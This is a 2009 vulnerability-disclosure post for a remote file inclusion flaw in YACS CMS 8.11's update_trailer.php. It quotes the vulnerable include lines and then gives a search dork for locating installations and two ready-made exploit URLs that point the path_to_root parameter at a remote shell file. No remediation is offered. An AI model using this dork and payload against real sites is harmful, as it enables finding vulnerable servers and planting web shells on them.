YACS CMS 8.11 update_trailer.php Remote File Inclusion Vulnerability

2009.02.17

Credit: ahmadbady

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

 -----------------[remote file include]-----------------
script: YACS version 8.11
------------------------------------------------------------------
download from: http://www.yetanothercommunitysystem.com/file-fetch/814-20081130-yacs-8.11rc30.zip
==============================================
vul: /yacs/scripts/update_trailer.php line 21 23 25;
include_once $context['path_to_root'].'shared/safe.php'; 21
if(!class_exists('i18n'))
include_once $context['path_to_root'].'i18n/i18n.php'; 23
if(!class_exists('SQL'))
include_once $context['path_to_root'].'shared/sql.php'; 25
==============================================
dork: "Powered by yacs"
----------------------------------------------
xpl:
http://127.0.0.1/path/yacs/scripts/update_trailer.php?context[path_to_root]=[shell.txt?]
http://127.0.0.1/yacs/scripts/update_trailer.php?context[path_to_root]=[shell.txt?]
***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]
from[iran]
---------------------------------------------------

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

YACS CMS 8.11 update_trailer.php Remote File Inclusion Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.